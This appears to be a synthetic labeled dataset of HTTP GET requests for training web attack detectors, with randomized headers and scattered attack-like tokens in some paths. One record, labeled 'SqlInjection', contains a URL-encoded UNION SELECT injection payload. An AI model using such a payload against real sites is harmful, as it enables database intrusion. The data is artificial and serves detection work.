Client-ip: 190.211.91.23
Cookie: r0=l;s7allttgm=sCWWJ;umgdmsneyoacmh=348
Cookie2: $Version="75"
Date: Wed, 16 Feb 05 18:16:03 UTC
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 25 Apr 08 07:44:16 CET
If-Unmodified-Since: Tue, 12 Aug 08 18:15:17 UTC
If-Match: "NYJ5sxLqLtMuby7"
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 4
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic dEZhbW9mOnVwYW9uaQ==
Range: -397
Referer: http://www.ssoexr.uk/civY.html
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 9.2; 2i-gn; rv:8.1.7) Gecko/78683013
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: deflate
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 120.66.15.37
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41113
Start - Id: 29704
class: Valid
GET /rmtaooqeahedHEehaa.sh?c4=4743 HTTP/1.1
Host: www.sna4ualm.uk:23078
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: ae=eN8
Client-ip: 243.181.147.105
Cookie: css=iUOsH-5
Cookie2: $Version="5"
Date: Sat, 25 Apr 09 06:53:42 CET
ETag: "hNpQ5fxQAsP2yEB1b"
Expect: ekfu=es1i;tet0D=rdov0e
From: nonai@Twda.it
If-Modified-Since: Sat, 06 Nov 04 02:15:32 CET
If-Unmodified-Since: Fri, 23 Jan 09 18:33:35 GMT
If-Match: "dNrsOt1U7d@JCBrHTY"
If-None-Match: "UH1Pf7JnluWqfPmiSB"
If-Range: Fri, 26 Jun 09 17:38:23 GMT
Max-Forwards: 113
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: dlaos 8licnng=aghmrC5
Range: -252619
Referer: http://www.lee91.it/nehi.doc
TE: trailers,trailers
Trailer: Accept
User-Agent: q8FMLiwj http://www.hKlenba.cz
UA-CPU: MIPS
UA-Disp: 162,5361,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7452x2793
Via: HTTP/1.3 www.dmt9uams.shtml, cSo2/3.5 www.iiiIeamy.gif:0
Transfer-Encoding: compress
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 786 www.dezo.shtml "nnoptssQ3so3s" 
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 2911766071168
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29704
Start - Id: 15072
class: Valid
GET /hQ-1mB/rh3Vrt8/e_UazrLX/sCJ6@bbfIlAzESvAD/EkNP%u/oKTfXkEJHmkPdOkH_w/aX/qPh5NA.Q6e4yYpC/by4p.0-EIprjabmse/iBGITZ6IMechoy/jEoc./lMHO.jsp?pyinPnUU6=tnlI2JOMTv9&se2fmvet7Ttr3=6&nasadi=nliby%3A&ismeNkeusedu=%26af9rnstsan2Hrr&KOIlinktelnetf1o=11943&saxs4cdefe=ggzt-wHtncftnhi&8rla0cwewqrt=267335&es9tnbvt=%5C%3Aon%3Chcopyerthdp&nehxdbeiha=07Ae+Flu%2Fodcef&dOssWs9ste=917&aeT_zW3=a%5Dki%5C%3FlsLis&aT0=epo5 HTTP/1.1
Host: www.vreed.gov:80
Connection: owmr2naa
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1280
Client-ip: 59.230.105.90
Cookie: copyWRPc=9670074;ayace2itoixp=09148;zhO=@ti'slGcf;vbOcnph-Rxp_I1nF3=62534;NhtnTmc=ceyns( tputE;lBj6nywwinntwo=874
Cookie2: $Version="618"
Date: Fri, 10 Oct 08 12:15:05 UTC
ETag: "JV0OLiFIhzERD6l"
Expect: 100-continue
From: yoa7I@ropq1e.be
If-Modified-Since: Tue, 20 Feb 07 23:42:28 UTC
If-Unmodified-Since: Thu, 09 Jun 05 04:39:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 44
MIME-Version: 2.9
Pragma: bbl4n55='f'
Proxy-Authorization: Digest response="a5e6c9C505B71e1cDdCFdCdB3aF006A7"
Authorization: wl9A al5Lo2nS=wetased3
Range: -3610,072048-063,-8
Referer: /tnirup9/ca1f1n.mpeg
TE: trailers,deflate;q=0.1,chunked
Trailer: Authorization
User-Agent: haaa (rpl5Lqn; t5Uameb2; g9.9qc9@f; uGjJhW_4J; guUD1E0Pbm)
UA-CPU: MIPS
UA-Disp: 3763,8529,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 656x086
Via: 8.7 www.sA0h.htm, HTTP/6.1 www.lnaanrbs.jpg, 4.7 www.hMhnti.png:8296
Transfer-Encoding: identity
Upgrade: ueemt/7.4, bah/0.8, rta/2.0, rbaf/1.3, siueo/2.5
Warning: 532 27.1.62.77 "o9ljtfr2eo5T2tvoe" 
X-Forwarded-For: 145.80.124.77
X-Serial-Number: 618402796
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15072
Start - Id: 19784
class: Valid
GET /i@Ambj8t3R/8wpsJh1ioh/uvioeNo/QktdWC/ndPenbdeot1/s6abR0xW.623fnVS8gi/kieMoe1lT1ntioTfgivh/cPGX@lkcfSPSIrIe.jpg?_2bqbncYN=o2ob&ei7sdt=aut0aelezlcms&hxgk=u+e0e%3D%3Dtmrutmy+&cldtcrse=89280&sztdeatO=9368&CRhygAFV7h=teerdflleit&4hsa=al+norn+%5Dibneizu%3Bsfie&srnp=eaexp_&6.2sperlKfg=1830836&na=sg7&buoeHsr=13202&ltOlegari=okt+t HTTP/1.1
Host: www.soeaks9.be
Connection: close
Accept: image/*;q=0.4, text/*;q=0.4, video/quicktime
Accept-Charset: iso-2022-jp;q=0.9, x-mac-chinesetrad, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 208.144.187.90
Cookie: 1jtetoouenhe6=095810;sRtOttr=h2wXReZDi9P;AzeRwgetq=0091450250
Cookie2: $Version="666"
Date: Sun, 25 Oct 09 02:19:05 UTC
ETag: W/"bWqhNQazozGGLlK2Sa2"
Expect: 7uezpiRu
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 26 Oct 05 16:02:54 GMT
If-Unmodified-Since: Tue, 04 Dec 07 11:40:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Apr 06 13:13:55 CET
Max-Forwards: 0967
MIME-Version: 6.2
Pragma: toke5ror='wAc'
Proxy-Authorization: NTLM NHRpQTVzMWlhYWFzU2F0eW9oYXA3ZXl3eXJ5dDFvbW1ob2FwNDNsaWxPZG9v
Authorization: Digest qop=bnttn
Range: 429206-7,67-5603
Referer: /rdgngDef/0atbrp1/7wrTsrrr/iNsr.txt
TE: trailers,chunked;q=0.4,deflate
Trailer: Upgrade
User-Agent: eoeefil/2.0.6.9.0
UA-CPU: x86
UA-Disp: 5903,193,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 951x1383
Via: 7.5 www.wetrttTr.png
Transfer-Encoding: compress
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 212517098577973192
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19784
Start - Id: 18218
class: Valid
GET /hpjqbn7llEbsvt8a/ht9nN3Eicio/i0/8boot.ini-NX/aFB/pyaj9OncehndHay.mspx?seaoqmal3hp=3583&e.LpYS@=71&cte8es3=nIoeert&i3en4=eWua3329X&group byPqwherenFR=7151705&hldee3as=3687&udcr=5weao8ewbf&brer5imov2aetoo=6971&lzayAnsEatn5e=6502321&P5bO=eKxJMsmcTMI-&thveh=lseBG5raUs&YihRl=%3E+me4&fvxTljG=DNhrTvbscriptao+nadra&0rtt=e08vZUvMOio HTTP/1.1
Host: www.7ffnna.org:80
Connection: u6hir
Accept: */*;q=0.4
Accept-Charset: iso-8859-7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 18.171.181.243
Cookie: intnnLweraec=eic;wEKDiutfantttn=\TtAbdgni
Cookie2: $Version="251"
Date: Mon, 23 Nov 09 05:31:14 CET
ETag: W/"xVLM-ZC4hTWiDr0C_fb@"
Expect: 100-continue
From: 7iSm3@efRm2wctt.st
If-Modified-Since: Fri, 03 Dec 04 12:52:47 CET
If-Unmodified-Since: Wed, 23 Nov 05 18:29:26 UTC
If-Match: *
If-None-Match: ".9gWcaT6bYNsYp85d"
If-Range: Mon, 08 May 06 07:20:21 UTC
Max-Forwards: 5
MIME-Version: 0.5
Pragma: rRde=3r
Proxy-Authorization: Digest username="3eohCe"
Authorization: NTLM dHh0YWRzbGRldGFpbjVhdmVlbG9pZGE5ZXNtU3ZzanVhZnN0ckd0aHpj
Range: 7902-
Referer: http://www.aptdfipr.it/trho9ect/rmsOmrma/nItt3FE7.htm
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.4 (X11; U; SunOS sun4u 9.0; 5l-sr; rv:5.2.8) Gecko/86011238
UA-CPU: MIPS
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 810x317
Via: 1.0 www.nmnoAeCa.tiff, FTP/7.8 138.32.215.117:01142, HTTP/7.6 168.130.27.15
Transfer-Encoding: identity
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18218
Start - Id: 1086
class: Valid
GET /TMyrfiLnnce/r.UDa/_cIpCbetween26QQuC/rlrodihdkabweitEt/enT7X/Esdhadhvtaefcti6/ldEibsa3qtro1ei7/stD0cLex0rVSOA3Nbz/eema9emdiieW1pR/su@h7o/GhP0dW9vWlYetc8Z.css?sit=al0UXfKS&eCt=3&hsnrWitSltg5=0840279&on=7&yerTb=+ti&tv3t2faEs7sy=%3Ee&owaeaofttxiaei=41656299&dcNjEO=e8e4ndsoartwen HTTP/1.0
Host: 84.150.253.72
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=2
Client-ip: 222.85.115.146
Cookie: Knia5vs9enskube=sy8@anELfLwE;kwe7mobmBncolte=ty7eofnt9sb;rOa2haeps=ddsamcRshb;2us=qO6nisr;armaogpt4=38991254
Cookie2: $Version="356"
Date: Sat, 29 Aug 09 13:38:06 CET
ETag: W/"24OIKzR5Cws.cTjN"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Wed, 03 Oct 07 15:38:39 GMT
If-Unmodified-Since: Sun, 03 Feb 08 06:13:48 GMT
If-Match: *
If-None-Match: "unhfcInXIh@eYH2F"
If-Range: "twttdXPLDQmQ.iFK9-"
Max-Forwards: 393
MIME-Version: 9.9
Pragma: ze=zhe
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Basic dGV5ZW1udDppZGxy
Range: -978,93442-,6-
Referer: http://iaaLt4.uk/neaj/osyya/Saoomese.png
TE: deflate
Trailer: If-Modified-Since
User-Agent: eo0i1alKaecbnashe
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8837x3320
Via: HTTP/1.9 184.100.10.164, ptt7t/8.2 www.raczt.htm
Transfer-Encoding: compress
Upgrade: n3ex/4.8
Warning: 222 www.aosWke.js "i9rrOt4h" 
X-Forwarded-For: 73.37.55.154
X-Serial-Number: 0153270
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1086
Start - Id: 10147
class: Valid
GET /lhkAnh/98KbobRoUpwVZPsnhST/wr/Ilikexwgetpfnzdbinzwinnt/HxF/sieeArr/saohiRe2zeisbslO7/knUteanr4a97Fq/igxce5oogt2awS4mlio/tlo5efwjin.tiff? HTTP/1.0
Host: www.ecdieacr.uk
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-8859-8-i, windows-874, iso-8859-4;q=0.4, iso-2022-jp;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: Mq-dtTy8qo, hsodo-hs, m-aastrl, oy-ispnd
Cache-Control: no-transform
Client-ip: 128.232.71.123
Cookie: al=eera;ynahoetM8feiwai=yezn;ngVe=5aes
Cookie2: $Version="9"
Date: Tue, 19 Jan 10 10:35:55 GMT
ETag: W/"@_LdD5SoTth2FBGOiH8n"
Expect: wsnon
From: ohLlh9sd@bflghwyl.cz
If-Modified-Since: Sun, 13 Jul 08 11:31:29 CET
If-Unmodified-Since: Wed, 17 Jun 09 10:41:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Aug 07 14:28:25 CET
Max-Forwards: 6559
MIME-Version: 0.8
Pragma: j=xwe7
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: NTLM OWxhZHFybFJFNGRscFJ5bjhzOTBlTGEwZHJuaWh6dWY0YXN0dG90c2FhaHpvbm4=
Range: 962502-,4-
Referer: /tLebbn/rsytN/hehtOe/6iSiie/tuelsee.css
TE: trailers
Trailer: Upgrade
User-Agent: gPvP.Bp http://www.prop.cz
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 012x3228
Via: s3o/9.7 www.07oO9ehe.htm
Transfer-Encoding: gzip
Upgrade: ebfs/2.8, haslr/4.2, fet/5.1
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 59958700676533276
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10147
Start - Id: 30304
class: Valid
GET /vwrinsennqmfn/tthn/tw5/rmpasswdty1/cDJpxxyo.n5OluRLs/of6TpY1eCP226di32/yzP/eaaeUurHl8u3tilcetio/wTozyaBBkWaa8hT.w/5euenteHbTn4reEnhE/g-Y-90H/mE1hV.NoykZfD.jpg? HTTP/1.0
Host: 195.211.139.18:9
Connection: close
Accept: video/*
Accept-Charset: x-mac-arabic;q=0.1, euc-kr, big5;q=0.6, cp-936;q=0.4, big5
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: rlFnSdqn='moln'
Client-ip: 125.84.82.200
Cookie: dusEyhenhpnsio=e;acetrmhaieKx5h=35
Cookie2: $Version="5"
Date: Fri, 05 Jan 07 01:20:18 GMT
ETag: "3YZ6EZYhmMpERRoUP"
Expect: s6y6sbh=lOeoDn;oetxro
From: zrsektq@asetec.cz
If-Modified-Since: Sun, 26 Dec 04 02:48:52 GMT
If-Unmodified-Since: Mon, 03 Jul 06 05:04:47 UTC
If-Match: *
If-None-Match: "k.Oy-c1GxQSJzwEMT"
If-Range: *
Max-Forwards: 299
MIME-Version: 1.8
Pragma: lT3eeEpU=a
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic dHl0dWF4YTplc3k3
Range: -942
Referer: /etsw.wmn
TE: trailers,chunked,gzip;q=0.2
Trailer: If-Range
User-Agent: Mozilla/2.9 (compatible; Konqueror/1.4; Linux i386; erAqe)
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4640x2891
Via: HTTP/2.1 134.183.235.132, 9.8 www.fv7doi.png
Transfer-Encoding: reol7a; efoRee=rndse2
Upgrade: hztley/9.7, peaeM/3.4, iwtar/8.7, 1Tzzin/0.9, roh/9.3
Warning: 978 www.pil8e.html "ohLjpsuln" 
X-Forwarded-For: 42.188.34.225
X-Serial-Number: 60742
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 30304
Start - Id: 29543
class: Valid
GET /mgweOhee/fHrn2h1@caFJ5LnM17/iGrlibKxJIzZhomeYL/o8wvyntFe/sestnjiFoiibsdxO.shtml? HTTP/1.0
Host: 13.60.84.193
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-874;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 57.230.106.186
Cookie: uavitaGg=70858;nb4eg6ra2=btnetcatv;as=d0tZ6;Aod3dkphe=de HlCl
Cookie2: $Version="17"
Date: Fri, 05 Oct 07 08:27:29 GMT
ETag: "e6j.ieGuWuJaBrxB9VF"
Expect: awianDu=fnketir;ruzioroe
From: rain@uiqt.com
If-Modified-Since: Tue, 15 Jun 04 20:53:09 GMT
If-Unmodified-Since: Sat, 15 Mar 08 03:22:04 CET
If-Match: *
If-None-Match: "zXYbCxNUnrpTciHhN"
If-Range: Wed, 29 Oct 08 07:46:24 GMT
Max-Forwards: 3226
MIME-Version: 6.1
Pragma: ica4tt='r'
Proxy-Authorization: NTLM dHZ1YWRsbHI4ZWFzbGFzb21peTRuUG9uT2VvZGNkcmRwdEZlaDI5b0ViYWFpZDg=
Authorization: Digest opaque="6waerney"
Range: 577564-305453
Referer: /eel3/ynDauaba/i6bo/owd18/mz9iA.asmx
TE: trailers,deflate,trailers
Trailer: Upgrade
User-Agent: reey/1.4
UA-CPU: StrongARM
UA-Disp: 416,1286,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: FTP/6.0 www.irem.shtml
Transfer-Encoding: compress
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 006 www.iee8.shtml "dbilileieeIdan8bsn6k" "Sun, 24 Aug 08 15:29:46 CET"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 97266154050
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29543
Start - Id: 31297
class: Valid
GET /yfF/hkS5nPwSC@KuWp/-cZF7I/oodpearyerfsssssrl/dNC2L951x5.I2.lTi.mdb?NBVT2REkzs=aiea&b3otohrxliep=%5B&tinMhe=2&eneneiEh=eud%3Fzu%3Eutjo5t&zeiasr5m=+rsczdi%3Bga&raao=p3CHSX&zp@@apsU1S=0720543&e1fzr=3&6dcdrodtutu=ibo+dsciO&GAe=tdninputg&-OS5=chs3%24&betweenjhYK=9805&heih=%3F5O%27a&ssee1ea=753 HTTP/1.0
Host: www.resevazobr.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic;q=0.6, macintosh, x-mac-arabic;q=0.4
Accept-Encoding: gzip;q=0.4, gzip;q=0.5, compress;q=0.9
Accept-Language: *
Cache-Control: max-stale=27036
Client-ip: 30.86.131.32
Cookie: eeexiurfs9a7t=s6dnodeeaa;retnepeuzT=ieki;uldeve3ihta7q9=tidef84;iaee0=l=8kcdHunlis
Cookie2: $Version="86"
Date: Wed, 12 Jul 06 24:06:05 GMT
ETag: W/"hymKgXG4n-DMde@"
Expect: 8ref
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Thu, 15 Jan 04 06:55:17 GMT
If-Unmodified-Since: Fri, 04 Apr 08 18:25:38 UTC
If-Match: "hq8CQatcPDLNf46.oY"
If-None-Match: "Wnt1ngqgXAz3tIZ28yI"
If-Range: *
Max-Forwards: 50
MIME-Version: 8.7
Pragma: txeaw=8alrtou
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Digest realm
Range: -388719
Referer: /r0roSj/nseeq3/hyeraY.asp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 6.8; la-us; rv:4.4.4) Gecko/67202238
UA-CPU: 68000
UA-Disp: 913,006,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: 5.0 www.mnxuaCh.css, 3.3 82.152.211.244:9671, ain/9.4 www.taob.png
Transfer-Encoding: gzip
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 19975103702041992
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31297
Start - Id: 3202
class: Valid
GET /gmabiIsrgbGe/lore3az3csa.exe?geaHeeoct1e1h=-childds&include4Th=+kU&AaV_68C_NGG=n90b&PEcDNsYvWJ=twLxnv-kxr7&9pr7i=ifa HTTP/1.1
Host: www.aosuosrPle.net:80
Connection: srUukapt
Accept: */*;q=0.3
Accept-Charset: windows-1257, cp-936;q=0.9
Accept-Encoding: *
Accept-Language: nlng-0e
Cache-Control: no-transform
Client-ip: 29.148.199.142
Cookie: ritaeioldva=sc
Cookie2: $Version="5"
Date: Thu, 24 Feb 05 05:25:30 UTC
ETag: "Sqqoqeb1HRptC3yA"
Expect: i8aBrh=hraare;e9lBhsn
From: esjrw@sdiElnyr.fr
If-Modified-Since: Sun, 22 Feb 09 13:39:57 CET
If-Unmodified-Since: Fri, 27 Mar 09 01:22:48 CET
If-Match: *
If-None-Match: "CpUPsEBio1d84uK8w3p"
If-Range: Mon, 25 Sep 06 11:11:05 GMT
Max-Forwards: 98
MIME-Version: 0.5
Pragma: ekn=2arn
Proxy-Authorization: lsahy VvxL4e=Anre
Authorization: Digest cnonce="by8u1h"
Range: -09285
Referer: http://ly8etod.st/7udt/iIinsoim/3o8ilopi/zbwozEP/innet8h.fgf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: hiyvtoigxAoeOc6gksp
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9049x212
Via: 4.1 www.oOt1igia.css, 7.1 www.vttt1c.shtml
Transfer-Encoding: gzip
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 184.121.22.71
X-Serial-Number: 272265156802487
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3202
Start - Id: 26799
class: Valid
GET /nEpb/saiaesiOoau.css?Jb9_HB-h-oZH=emtedtEdT&ygd62c=1A6Qc-MrHjN&sbRxadstueiAnow=6005984948&nW-Vopt.7s=%5Cdropxmlqa%3Bo8At%26suwmn&MTNm=nromuaoqw HTTP/1.0
Host: 151.218.45.85
Connection: ud3mlT1
Accept: */*;q=0.7
Accept-Charset: iso-8859-9;q=0.8, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 41.148.162.64
Cookie: PWlocation8QAyd=4kyssmthtrsbt;st1oleoah7tynew=51519878;xamj9=sDvUA-@BXQ7;b6sIAsevv=l?
Cookie2: $Version="658"
Date: Fri, 26 Oct 07 21:49:03 CET
ETag: W/"uO.yVFnIZtgrTdYokFBZ"
Expect: 100-continue
From: kEqlnim@ntnj.ch
If-Modified-Since: Sat, 12 Mar 05 12:50:44 UTC
If-Unmodified-Since: Fri, 08 Jan 10 19:35:43 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Oct 04 08:11:55 GMT
Max-Forwards: 9276
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://dilak.net/sazsrhrt.gif
Range: 09-115498
Referer: /arRtDkM/mmdi/ttbNre3/qsemeE/udJlH.jpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.0 (compatible; MSIE 6.0; Solaris; oirrd; r8ig4ne7m; rs6rwe)
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 5.0 222.60.67.255, HTTP/2.8 32.210.68.24, 7.5 www.j6O7p.shtml:4531
Transfer-Encoding: titeur
Upgrade: coar/9.8
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 63.148.52.222
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26799
Start - Id: 31194
class: Valid
GET /rjA@/1ohtso6ytbse2tN1e.dll?masaa=81472&8aleirwBvrn5u=oKyJXMta.qf&t5eepwlsao9=087530 HTTP/1.0
Host: www.Lf9en.cz
Connection: lnzlLo8e
Accept: audio/*
Accept-Charset: x-mac-ce;q=0.3, cp-936;q=0.8, iso-8859-7;q=0.0, euc-cn;q=0.3
Accept-Encoding: deflate, gzip, compress;q=0.4, gzip;q=0.5, compress;q=0.1
Accept-Language: ersj-estl;q=0.4, qwova-suohw
Cache-Control: no-transform
Client-ip: 175.99.146.152
Cookie: etedkdeetatp7h6=8
Cookie2: $Version="19"
Date: Tue, 23 Mar 04 13:52:22 CET
ETag: "a..-DSc4OuWYd_X"
Expect: 100-continue
From: htelogv@hahUen.st
If-Modified-Since: Sun, 11 Jan 09 23:04:10 UTC
If-Unmodified-Since: Wed, 24 Feb 10 07:27:30 CET
If-Match: "cRaeNt6CrOiwsvtJH"
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: *
Max-Forwards: 4201
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: NTLM Z2Rlb3JhNWV1aG9vZGRGTHdFa3NoRHM0eWFtMG8xZTR0dzBiNnN0bmY=
Range: 487-253698,1-,198-1
Referer: /djdphdm/cfqxbhas/t3yza.zip
TE: trailers,chunked;q=0.9
Trailer: Expect
User-Agent: sv0.UNMKtr http://www.nyxzrsEi.uk
UA-CPU: x86
UA-Disp: 2938,170,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: FTP/5.7 13.97.140.127, 0ewh/3.2 www.ehneh.tiff, 6.9 www.oieiNir.png:17252
Transfer-Encoding: compress
Upgrade: eulede/1.2, upIa/0.2, nidt/3.1, e6Ne/6.8
Warning: 967 9.3.197.185 "stmf" 
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 06672933371501212247
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31194
Start - Id: 35198
class: SqlInjection
GET /oh0erfeiHwDmnohd.php3?lexd=691930&lanjz=3190&srborgcn=8&etrqyec5e6embas=%27+%29+UNION++++ALL++++SELECT+++638%2C7%2C0692%2C5804%2C9350++FROM++omsrco++WHERE++%28+%27%27%3D+++%27&dekteaydsmd=ck9%3Chlwtsuzf9 HTTP/1.0
Host: 72.74.246.64
Connection: close
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 78.116.124.236
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="703"
Date: Fri, 22 Dec 06 24:27:21 UTC
ETag: "DbCdbaoTP71g3BdsFL"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Thu, 15 Nov 07 17:26:46 UTC
If-Unmodified-Since: Sun, 20 Sep 09 19:45:48 CET
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Wed, 20 Jul 05 16:13:02 GMT
Max-Forwards: 0292
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: Basic ZGdhaW06YWtoOHdleQ==
Range: 91-
Referer: /anteidlr/ekctpns.asmx
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: sk.Oqe http://www.Aeaoa.org
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: compress
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35198
Start - Id: 26259
class: Valid
GET /yS.djDtNJ888bulbEcb/nNW5/3AJcbE/tha0heid3Oi2dc/tbiSh.rqSYzwxLZ/_access_log/inputFWW6JV0j_nullcu/hanes/oisOanohtnjdutt.msf? HTTP/1.1
Host: www.soerdnI.fr
Connection: close
Accept: audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 70.146.111.185
Cookie: seasI4rjio=01;itf=2Rgehaesshaclif;1qs=312;0ounbosh=753304859;utocUc=9292;ibe93r=[wsamuaaeoihr<ssl~wnhj
Cookie2: $Version="197"
